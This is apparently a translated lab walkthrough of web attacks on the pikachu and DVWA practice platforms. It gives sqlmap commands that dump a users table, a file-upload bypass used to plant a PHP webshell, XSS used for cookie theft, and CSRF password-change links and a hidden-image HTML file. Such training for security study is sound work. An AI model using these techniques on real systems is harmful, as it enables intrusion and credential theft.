1. SQL injection
-
First enter the pikachu vulnerability practice platform, find the SQL character injection (get), we can enter any word,
-
We can see that it is indeed a get request
-
Copy the url of the web page and open sqlmap
-
Check which databases
python sqlmap.py -u "http://192.168.242.1/vul/sqli/sqli_str.php?name=%E9%98%BF%E7%B4%A2&submit=%E6%9F%A5%E8 %AF%A2" --dbs
-
Check which tables are in the pikachu database
python sqlmap.py -u “http://192.168.242.1/vul/sqli/sqli_str.php?name=%E9%98%BF%E7%B4%A2&submit=%E6%9F% A5%E8%AF%A2" -D "pikachu" --tables
-
Start blasting username and password
python sqlmap.py -u “http://192.168.242.1/vul/sqli/sqli_str.php?name=%E9%98%BF%E7%B4%A2&submit=%E6%9F%A5% E8%AF%A2" --dump -D "pikachu" -T "users" -C "username,password"
Two, one sentence Trojan upload (1)
-
Range content selection: pikachu Unsafe Fileupload
-
Let's first take a look at the effect of uploading php files directly. The website requires that only image files can be uploaded, so when we choose to fly image files. As shown in the figure below, just after selecting the file, before you click "Start Upload", a pop-up prompts that the uploaded file does not meet the requirements.
-
Bypass posture, client verification generally has two bypass methods (1) the browser disables javascript (2) burpsuite captures packets and changes the suffix. Here we use the second one.
First we write a php file with a one-sentence Trojan horse
-
Change the file suffix to png and try to upload, use packet capture software to capture packets during upload
-
Catch the message as shown in the figure, right click send to repeater
-
Change the file suffix to php, click send, upload successfully
-
Shows that the file was uploaded successfully
Three, one sentence Trojan upload (2)
-
Select range, MIME type
-
Try to upload a php file, it shows that the uploaded picture can only be in jpg, jpeg, png format!
-
Bypass method: (1) upload 123.php, burpsuite captures the packet and modifies the MIME type (2) uploads sh.png, burpsuite captures the packet and modifies the file suffix Here we use the second method
to upload 123.png, and burpsuite
captures the packet as shown in the figure The message shown, right click send to repeater
-
Change the file suffix to php, click send, upload successfully
-
The MIME type is reflected in the Content-Type field in the HTTP request message. In the protection code of this level, $mime is an array containing legal MIME types, that is, the white list of MIME types; then this white list is passed as a parameter to the upload_sick() function for server-side detection.
However, the upload_sick() function has two insecurities:
(1) It only checks the MIME type, which can be bypassed by packet capture modification.
(2) The file was not renamed when saving the file, so even if the web page does not echo the file save path, there is a high probability that the attacker can guess it.
There is another insecurity in the whole level, that is, the file save path is echoed. After successfully uploading the webshell and knowing the path to save the file, the attacker can connect to the shell
4. Connect to the webshell -
Use the ant sword to connect to the back door we left
-
After clicking Add, we can see that we have a record
-
Right-click and select file management, we can operate the files of the website
The website file directory is as follows
5. Use pikachu to reproduce xss vulnerabilities
(1) reflective xss (get)
-
Select reflective xss (get)
-
We enter a simple XSS statement attack to get the user cookie
get admin cookie
(2) Stored XSS
-
There is no length input limit for this level, we directly enter the payload:
-
And our records also appeared in the message list
3. Now we change a browser and enter this level page, we can see that a dialog box pops up, indicating that stored XSS can endanger all users who visit the affected page.
6. Use DVWA to reproduce the CSRF vulnerability
(1) low difficulty
1. First, we set the security level of DVWA to low
-
We choose the CSRF page
-
We can know that at the low level, the original code of the page does not have a hidden token
-
So we can forge a simple link: add after our original address? password_new=password&password_conf=password&Change=Change#Once the user clicks the link, a red letter will appear:
In this way, we have successfully changed the password to password
(2) medium difficulty
- We first set the difficulty to medium
2. Enter the source code to check the difference with low difficulty.
We can find that there is one more line of if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] ) ) compared to the low difficulty code
.
The function is: check whether the string function contains pattern, if yes, return True, otherwise False
Therefore, this sentence is to judge whether HTTP_REFERER contains SERVER_NAME, HTTP_REFERER is the value of the Referer parameter, that is, the source address. SERVER_NAME is the host parameter and the host ip name. So, if we want to crack it, we need to make the Referer parameter value include the hostname
3. We write two html files as the attacked address:
<·img src="http://192.168.1.102/dvwa-master /vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#” border="0" style="display:none;"/> <·h1>404<·h1> <·h2>file not found.<
h2
· >
After writing, name it as ip address.html format, such as: 192.168.242.1.html and then put it in the DVWA file of the root directory of the webpage WWW
- We open the burp suite, capture a packet on the csrf interface, send it to the repeater, and change the Referer address to http://attacker server address/dvwa/attacked ip address.html format, as shown in the figure:
Password changed successfully
(3) high difficulty
- We first set the difficulty to medium
2. Enter the source code to view the difference from low difficulty
This time with the token value, this value is not easy to see, we need to get the token value of the victim on the attacker server. The essence of a csrf attack is that all parameters of important operations can be guessed by the attacker.
So we have to get the token value.
3. We can exploit the xss vulnerability. We need to construct a statement to obtain the token. Due to the character limit, there are two methods here. One is to use burp suite to capture packets, then change the parameters and run to obtain the token. The second is to use the Firefox browser.
-
We use burp suite to capture packets and get cookies
-
After getting the token, you can use the attack method of medium to realize the attack